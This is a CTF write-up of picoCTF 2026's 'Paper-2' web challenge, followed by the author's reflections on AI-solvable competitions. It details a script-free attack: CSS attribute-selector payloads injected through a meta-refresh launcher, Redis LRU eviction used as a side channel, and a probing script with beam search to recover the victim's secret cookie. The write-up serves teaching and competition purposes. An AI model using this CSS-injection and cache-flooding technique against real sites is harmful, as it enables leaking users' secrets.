picoCTF 2026: Paper-2 Writeup + Reflections

Foreword

PicoCTF is one of the largest CTFs that takes place every year in March. It's run by Carnegie Mellon University and caters to all difficulty levels. Pico was one of the first large CTFs I ever played, and being able to place top 3 in the US HS/MS bracket is a dream come true.

However, this year was one of the weakest years of PicoCTF, as everything was "sloppable" or easily solved by AI. If you'd like to skip straight to my thoughts on the competition, check out Addressing the slop below.

Despite everything being AI-solvable, ehhthing managed to make another extremely difficult challenge. If you're not familiar, ehhthing is the creator of two notoriously hard challenges from previous years of PicoCTF:

Info

secure-email-service (2025): Inject headers to get the admin to sign and send your XSS payload, then steal the flag.

elements (2024): Craft a valid XSS element chain in the game to execute JS, then bypass the strict CSP and leak the flag via a side-channel/timing-based exfiltration.

Below is my writeup on how my team (me, Mr-MPH, JT314, S3af, Programmer_user) solved the hardest challenge in the event.

Paper-2

paper-2

Insane

Authorehhthing

CategoryWeb Exploitation

Points500

Solves98

FileDownload

Flag

picoCTF{i_l1ke_frames_on_my_canvas_[REDACTED]}

A piece of paper is a blank canvas, what do you want on yours?

We are provided source for this challenge:

paper-2

The file structure is standard for a Bun application; nothing actually important here.

Info

This challenge is a sequel to Paper-1, where you had to use CSS selectors to conditionally render <object> tags in the DOM, then count visible frames with JavaScript to binary-search each secret chars without network exfiltration.

Understanding `index.ts`

This file contains all the program's logic, but only a few sections are crucial to understanding the challenge's constraints.

Content Security Policy (CSP)

Info

Content Security Policy (CSP) is a browser security mechanism that prevents what content can be executed or loaded on a page.

index.ts

 4 collapsed linesconst headers = (type: string) => {
	return {
		headers: {
			'Content-Type': type,
			'Content-Security-Policy': [
				"default-src 'self' 'unsafe-inline'",
				"script-src 'none'"
 5 collapsed lines			].join('; '),
			'X-Content-Type-Options': 'nosniff'
		}
	}
}

All responses use CSP which eliminates all JavaScript execution vectors. This is a major constraint to take note of as we can't use fetch, XHR, eval, or event handlers to exfil data.

Bot Execution

index.ts

const visit = async (url: string) => {
 5 collapsed lines	await redis.set('browser_open', 'true');
	const secret = randomBytes(16).toString('hex');
	let browser: Browser | null = null;
	const userDataDir = await mkdtemp(join(tmpdir(), 'paper-'));
	try {
		browser = await puppeteer.launch({
			executablePath: '/usr/bin/google-chrome',
 2 collapsed lines			args: [
				'--no-sandbox',
				'--disable-gpu',
				'--js-flags=--noexpose_wasm,--jitless',
				'--host-rules="MAP paper.local 127.0.0.1"'
 7 collapsed lines			],
			headless: true,
			pipe: true,
			userDataDir
		});
		await browser.setCookie({
			name: 'secret',
			value: secret,
			domain: host,
			sameSite: 'Strict'
 5 collapsed lines		});
		const page = await browser.newPage();
		await redis.set('secret', secret, 'EX', 60);
		await page.goto(url);
		await Bun.sleep(61000);
	} catch(e) {}
	await redis.del('secret');
	await redis.del('browser_open');
}

This is where the challenge larps as a victim. More specifically it:

Generates a fresh 32-char secret each time
Stores it in Redis (60s TTL) and injects it into a Chrome instance cookie
The bot then visits to the attacker's URL and sleeps for 61 seconds
After the 61-second nap is done, the secret is deleted from Redis and the browser_open flag is cleared
Each subsequent visit then gets a completely NEW secret, there is no persistance what so ever.

File Uploading

index.ts

'/upload': {
 5 collapsed lines	POST: async (req: BunRequest): Promise<Response> => {
		const file = form.get('file');
		if (!file || !(file instanceof File) || !file.size || file.size > 2 ** 16) {
			return new Response('no file upload!', headers('text/plain'));
		}
		const id = await redis.incr('current-id');
		const data = JSON.stringify([file.type, (await file.bytes()).toBase64()]);
 1 collapsed line		await redis.set(`file|${id}`, data, 'EX', 10 * 60);
		return Response.redirect(`/paper/${id}`);
	}
},

The program accepts arbitrary file uploads up to 64KB. Files are then stored in Redis with a 10-minute TTL.

Another key thing to note is there is no limit to files you can upload.

File Serving

index.ts

'/paper/:id': async (req: BunRequest<'/paper/:id'>): Promise<Response> => {
	const res = await redis.get(`file|${req.params.id}`);
 1 collapsed line	if (!res) return new Response('not found!', headers('text/plain'));
	const [type, data] = JSON.parse(res) as [string, string];
	return new Response(Buffer.from(data, 'base64'), headers(type));
},

This serves the uploaded files to the bot (keep in mind CSP still matters). This means even if you upload HTML or JS files, they can't run because of script-src 'none' policy. However, CSS files are still evaluated and CSS has more power than you might think (foreshadowing).

Secret Exposure

index.ts

'/secret': async (req: BunRequest): Promise<Response> => {
	const secret = req.cookies.get('secret') || '0123456789abcdef'.repeat(2);
	const payload = new URL(req.url, 'http://127.0.0.1').searchParams.get('payload') || '';
	return new Response(
		`<body secret="${secret}">${secret}\n${payload}</body>`,
		headers('text/html')
	);
},

This returns HTML with the secret placed in the body attribute: <body secret="...">.

The main issue here is you cannot read this attribute with JavaScript (CSP blocks it).

Flag Submission

index.ts

'/flag': async (req: BunRequest): Promise<Response> => {
	const guess = new URL(req.url, 'http://127.0.0.1').searchParams.get('secret');
 2 collapsed lines	const secret = await redis.getdel('secret');
	if (secret && secret === guess) {
		return new Response(Bun.env.FLAG || 'picoctf{flag}', headers('text/plain'));
	}
	return new Response('wrong', headers('text/plain'));
},

This checks if your secret is correct against the stored value using getdel(), which atomically (holy vocab larp) retrieves and deletes the secret in one move. If you guess wrong, the secret is instantly deleted which means you can only call /flag once.

This is another critical constraint as we must figure the entire 32 char secret perfectly in one submission.

Bot Trigger

index.ts

'/visit/:id': async(req: BunRequest<'/visit/:id'>): Promise<Response> => {
 1 collapsed line	if (await redis.get('browser_open')) return new Response('browser still open!');
	const res = await redis.get(`file|${req.params.id}`);
 1 collapsed line	if (!res) return new Response('not found!', headers('text/plain'));
	visit(`https://${host}/paper/${req.params.id}`);
	return new Response('visiting!', headers('text/plain'));
}

This starts a bot and sends it to load the specified file. browser_open ensures only one bot instance runs at a time and if you call /visit/:id twice, the second call will be rejected.

So that also adds on to the fact that we have to wait ~61 seconds (the bot sleep time) between attempts. And once again each visit generates a new secret and provides one 61-second window to leak information.

The Constraint Landscape

Now this is a lot of information to process, let's summarize the key constraints:

Execution:

JS is completely blocked by CSP
CSS can be evalled
Each bot visit lasts exactly 61 seconds
Only one bot can run at a time (~61 second gaps between visits)
Secrets are generated fresh for each visit

Flag Submission:

You MUST guess the full 32-char secret in one attempt
Wrong guess == secret nuked (via getdel() func)
32 hex chars is 16^32 ≈ 1.2 × 10^38 possibilities rendering brute force impossible

Resource:

Files stay in Redis for 10 minutes
You can upload unlimited test files
Redis is the shared cache for all visited

Quick Detour

docker-compose.yaml

services:
  redis:
    image: redis:7-alpine
    command: redis-server --maxmemory 512M --maxmemory-policy allkeys-lru --save "" --appendonly no
  web:
    build: .
    init: true
    ports:
      - 8443:443

The main issue is CSP is brutal, literally nothing executes but CSS. But the docker-compose does give us something useful: allkeys-lru.

Info

allkeys-lru (Least Recently Used) is a Redis eviction policy. When the 512MB limit is reached, Redis automatically deletes the least recently accessed items. "Recently accessed" = accessed within the time window; old accesses go away.

The Realization

Remember how CSP blocks all JavaScript but CSS still gets evaluated? And the /secret endpoint places the secret directly in the HTML as <body secret="...">?

CSS has attribute selectors - [secret^="a"] (starts with), [secret$="f"] (ends with), and [secret*="abc"] (contains). This means we can conditionally load resources based on the secret's value. If we upload a marker file to Redis and write CSS like this:

body[secret*="abc"] { background-image: url(/paper/123); }

The bot will only fetch /paper/123 if "abc" actually appears in the secret. That redis.get() call makes the key "recently accessed." If the selector doesn't match, the file never gets requested and sits untouched in Redis.

So we now have a way to check if any short string exists inside the secret, all without a single line of JavaScript.

CSS as an Oracle

The naive approach is one selector per char per position (e.g body[secret^="a"], body[secret^="b"], etc.) But that only leaks one char per bot visit, and with 32 chars and 61-second windows, that's ~30 minutes of time we do NOT have. We need to go wider.

The first thing we tried was dumping all our selectors into one background rule:

body[secret*="abc"] { background: url('/paper/marker_abc'); }
body[secret*="abd"] { background: url('/paper/marker_abd'); }
body[secret*="abe"] { background: url('/paper/marker_abe'); }

However this didn't work as CSS background only applies one value and if multiple selectors match, the last one wins and only that one marker gets loaded. We need every matching selector to fire by itself.

We can fix this by making it so each selector sets a CSS custom property to a url(), and a trigger element references all of them. Only the variables that got set cause HTTP requests:

body[secret*="abc"] { --m_abc: url('/paper/marker_abc'); }
body[secret*="abd"] { --m_abd: url('/paper/marker_abd'); }
body[secret*="abe"] { --m_abe: url('/paper/marker_abe'); }
 
/* trigger element loads all matched markers */
#t { background-image: var(--m_abc, none), var(--m_abd, none), var(--m_abe, none); }

Info

CSS custom properties (aka CSS variables) are values you define with --name and reference with var(--name, fallback). The key actions here: if the variable was never set (because the selector didn't actually match), var() falls back to none which means there was no HTTP request. This lets us have thousands of selectors without them clobbering each other.

So now every matching selector will independently trigger a fetch. With that problem finished, we can test way more than single chars:

Trigrams (body[secret*="abc"]) - every 3-char hex combo that appears anywhere in the secret. So about ~30 overlapping trigrams can reconstruct the entire 32-char secret.
Bigrams (body[secret*="ab"]) - this is more coarse but more reliable, we fills gaps where trigram output isn't very strong
Prefix/suffix (body[secret^="ab"], body[secret$="ef"]) - this appends to the start and end, which *= (contains) selectors alone can't differentiate
Controls - body[secret] (this always matches, since the attribute exists) and body[secret*="ggg"] (never matches as g isn't a hex char). This is important to reduce the noise.

That's a total of 5,024 unique labels. Each one gets replicated 3x to reduce variance = ~15,000 markers total.

Each marker is a small 2KB file uploaded via /upload, which hands back a paper_id. Those IDs become the URLs in our CSS:

Upload a marker file -> get paper_id back
CSS rule then references it: body[secret*="abc"] { --m_abc: url('/paper/4521'); }
When the selector matches, the browser will fetch that URL -> Redis marks that key as recently accessed

We then bundle ~220 selectors per CSS file (ensuring we are staying under the 64KB upload limit).

But there's a problem with this: the bot visits /paper/:id, not /secret. The secret attribute only exists on /secret path. So we upload a launcher HTML that uses meta refresh to redirect to /secret?payload=..., injecting our CSS <link> tags and trigger <div>s into the secret page:

<!doctype html>
<meta http-equiv="refresh" content="0;/secret?payload=
  <link rel='stylesheet' href='/paper/css_0'>
  <link rel='stylesheet' href='/paper/css_1'>
  ...
  <div id='trig0' style='width:1px;height:1px'></div>
  <div id='trig1' style='width:1px;height:1px'></div>
  ...
">

So now when the bot visits our launcher, it gets redirected to /secret which renders <body secret="..."> w/ our CSS injected via payload. The selectors eval against the real secret.

Cache Eviction as a Side-Channel

Our teammate s3af kept talking about a side-channel vuln (which never existed) when we were looking for vulns, so it was quite funny to me that there was a side-channel element in this challenge

The cache eviction element has two phases:

Before triggering the bot, we prefill Redis with 4,200 garbage files (each ~65KB) to push memory close to the 512MB limit in redis. This means our markers and CSS bundles will be competing for space, so when we re-upload the CSS bundles and launcher after the prefill,they don't get evicted before the bot even visits.
Now we trigger the bot. The bot visits our launcher, the CSS evals, and the matching markers get fetched (which makes them "recently accessed"). After waiting ~10 seconds for the CSS to fully eval, we hit Redis with a second wave of 1,400 more garbage files. This tips Redis over the edge and forces Redis to perform LRU eviction. The untouched markers AKA the ones whose selectors didn't match will get evicted first.

Upload ~15,000 markers + CSS bundles + launchereach marker is a 2KB file, CSS references their paper_ids

Prefill: upload 4,200 garbage filespush Redis close to 512MB limit

Re-upload CSS bundles + launcherso they survive the prefill eviction

Trigger bot visitCSS evals, matching markers get fetched

Wait ~10 secondsgive CSS time to evaluate all selectors

Flood: upload 1,400 more garbage filespush Redis over the limit, force LRU eviction

Probe all markers200 = survived, 404 = evicted

After Bot Visit (before flood)

marker_a · untouched

marker_b · untouched

marker_c · untouched

marker_f · ✓ CSS loaded

... thousands more · untouched

4,200 prefill files

After Flood + LRU Eviction

marker_f · ✓ survives

1,400 flood files

marker_a · ✗ evicted

marker_b · ✗ evicted

marker_c · ✗ evicted

Then we probe every marker. We blast all ~15,000 with concurrent requests where 200 means it survived, 404 means evicted:

def probe_markers(base, markers, workers=900, timeout=2):
    def check(m):
        r = session.get(f"{base}/paper/{m.paper_id}", timeout=timeout)
        return m if r.status_code == 200 and r.content != b"not found!" else None
    with ThreadPoolExecutor(max_workers=workers) as ex:
        results = ex.map(check, markers)
    return [m for m in results if m is not None]

Each run gives us around ~50-60 survivors out of thousands. Those survivors are the markers whose CSS selectors also matched the secret.

Reconstructing the Secret

New problem: you can't just take the surviving trigrams and stitch them together as the process of LRU eviction is quite noisy. Some markers survive by luck, and some get evicted despite being touched (which is when they are uploaded early & aged out). In general the process of naive reconstruction produces a LOT of garbage.

Why naive doesn't work

Are you still confused, let me elaborate futher...

Say trigrams abc, bcd, and cde all survived, the secret probably contains abcde. But what if xyz also survived by chance? Now you have a false branch with no way to tell which path is actually real. With 50+ survivors and only 32 chars of secret, there are many spurious (holy membean word) trigrams messing w/ the signal.

And we can't just rerun the attack and intersect results as each bot visit generates a completely new secret. And every run leaks information about a different string.

Control calibration

All of that is why control markers matter. The "always-match" controls will tell us "ok, what does survival look like for a marker that was accessed?" and the "never-match" controls tell us the opposite.

For each control we check how many of its 3 replicas survived:

# build survival histograms for controls
t_hist = [0, 0, 0, 0]  # indices 0..3 (replica survival counts)
f_hist = [0, 0, 0, 0]
 
for ctrl in always_match_controls:
    k = sum(1 for r in ctrl.replicas if r in alive_ids)
    t_hist[k] += 1
for ctrl in never_match_controls:
    k = sum(1 for r in ctrl.replicas if r in alive_ids)
    f_hist[k] += 1
 
# log-likelihood ratio so how much evidence does k survivors provide?
llr = [log(t_hist[k] / sum(t_hist)) - log(f_hist[k] / sum(f_hist))
       for k in range(4)]

Info

Log-likelihood ratio (LLR) measures how much a piece of evidence supports one hypothesis over another. In this case, if a marker has 3/3 replicas alive and the LLR for k=3 is +2.1 that corroborates that the selector matched. And if it has 0/3 alive and the LLR for k=0 is -1.8, that's pretty strong evidence it didn't. So values near 0 are deemed as inconclusive.

If most "always-match" controls have about 2-3 replicas alive and most "never-match" controls have 0-1, we have a clean run. The LLR table maps any marker's replica survival count directly to a confidence score.

I definitely suggest you look into this, if you didn't understand my explaination!

Age bias

Here is our bajillionth problem: now markers uploaded first sit in Redis longer and are more likely to get evicted regardless of whether they were touched. A marker at index 50 that survives is far more sus than one at index 4,900 that survives so the early one had to beat longer odds.

We bin markers into 24 groups by upload order and then compute the per-bin survival baselines from the controls, then normalize scores so early survivors get boosted up.

After scoring, we then clip all LLR values to ±1.5 so no single marker can over-dominate the final ranking. And prevents one noisy outlier from throwing off the entire construction of the secret.

Beam search

Now with the calibrated scores for every marker, we can assemble 32-chars candidates via beam search (thank you tiktok video!):

Info

Beam search is a heuristic search algorithm that builds solutions step by step, but only keeps the top k most promising candidates (the "beam width") at each step. Unlike brute force (which explores everything) or greedy search (which only keeps the #1), beam search will balence thoroughness with speed. Here we use a beam width of 3,000.

Seed with all 4,096 possible 3-char hex prefixes, which are scored by their prefix + trigram LLRs
Extend each candidate by one hex char and adding the new trigram and bigram scores
Prune to the top 3,000 candidates by combined score
Repeat allat until we hit 32 chars
Add suffix scores and then re-rank

Note

if a trigram already appeared earlier in a cand, we penalize extending w/ it again. And w/o this, beam search grabs onto high-scoring trigrams and keeps looping which would produce crap like abcabcabc... instead of the actual secret.

Flag :)

Finally, the program outputs a ranked list of candidates and will submit #1 to /flag and once again since getdel() nukes the secret on any attempt, there is no second chance...

If you wanna check out the full (heavily ai-slopped) solve script, it's here. Note that it takes about ~10 runs for it to work.

TL;DR

CSS attribute selectors leak which substrings exist in the secret by selectively fetching Redis keys. Flood Redis to trigger LRU eviction, probe which markers survived, score with log-likelihood ratios, and beam search the 32-char secret.

Addressing the slop 🗑️

Update: Jammy has killed all hope I had for CTF, expect a CTF death day by Q2 2027. My entire opinion is useless atp :(

Paper-2 was by far the best challenge in picoCTF 2026. But the rest of the event was disappointing, 69/70 challenges could be solved by just feeding the challenge to an LLM and asking for the flag.

There was a HUGE lack of a difficulty curve; most challenges were either trivial/sloppable or Paper-2. And really it's the fact that authors aren't putting proper effort into LLM-proofing their challenges. The reason ehhthing's challenges consistently resist this is because the vuln isn't contrived.

Overall in the CTF community there's a sense of outrage against AI slop and the fact that everything is sloppable.

As BraydenPikachu put it during DiceCTF 2026 quals, authors made their challenges using AI (can't quote perfectly), ChatGPT will save that information which allows it to solve that same AI-made challenge 10x faster, and it's a never-ending cycle. This further pushes the fact that yes, we can have beginner-friendly competitions, but we also must combat slop by actually making the challenges.

The issue isn't THAT bad

Many people were clowning on DiceCTF on X/Twitter because a lot of the challenges were sloppable, and yes that's an issue, but there were still some unsolved ones which made the difference between top 10 on the leaderboard. Those challenges were Kernel Pwn, hard blockchain, etc. and they still require a huge skill diff. It's not over just yet for CTFs.

At the same time, CTFs are changing. With the rise of low-effort AI-solvable challenges, it's becoming easier to skip the learning process entirely instead of actually building problem-solving skills. The whole point of CTFs was that you'd bang your head against something for hours, learn something new, and come out the other side a better hacker. Now you can just paste the challenge into Claude and get a flag in 30 seconds and what did you learn? Nothing. You got the (amazing) dopamine hit without any of the growth.

I also think there need to be changes in what the motivations for CTFs are. If the goal is just "get flags fast," then yeah, autosolvers win and the game is cooked. But if the goal is to actually push people to think creatively and develop real skills, then challenge authors need to step up and write problems that can't be trivially slopped. ehhthing proved it's possible and the rest of the community just needs to catch up.

Auto Solvers

PicoCTF did introduce me to the idea of making a proper autosolver. For example, C-Bass's team Cosmic Bit Flip took 1st with their autosolver.

I was so utterly impressed with this yet saddened that CTF had come to this, but props to C-Bass for making a pretty well-designed autosolver against picoCTF. They genuinely deserved first for out-strategizing me and my qAgent (blog on that soon lol)

Closing thoughts

Genuinely, shout-out to my goated team. We were working till 3 AM trying to solve. And massive respect to ehhthing for creating challenges that actually make you think instead of AI-larping.

(Three more genuinely's and I would be on the News 😭)

If you are reading this, solved paper-2 (with minimal AI), and looking for a CTF team, Submit a SPL Application @ spl.team/join

Also if you are a Pico Organizer, please make sure NotDeGhost's challenges are actually pushed through. This year NEEDED another Pachinko Revisted 🙏🏾

Even with my thoughts above, I do think people need to embrace AI and implement it in their workflows. It also creates funny moments like this...

Image showing me telling my team to boot their AI's up — The Holy Trinity

People ask me why I'm so addicted to CTFs and it's things like this that make it beautiful.

picoCTF 2026: Paper-2 Writeup + Reflections

Foreword

Paper-2

Understanding index.ts

Content Security Policy (CSP)

Bot Execution

File Uploading

File Serving

Secret Exposure

Flag Submission

Bot Trigger

The Constraint Landscape

Quick Detour

The Realization

CSS as an Oracle

Cache Eviction as a Side-Channel

Reconstructing the Secret

Why naive doesn't work

Control calibration

Age bias

Beam search

Flag :)

Addressing the slop 🗑️

The issue isn't THAT bad

Auto Solvers

Closing thoughts

Understanding `index.ts`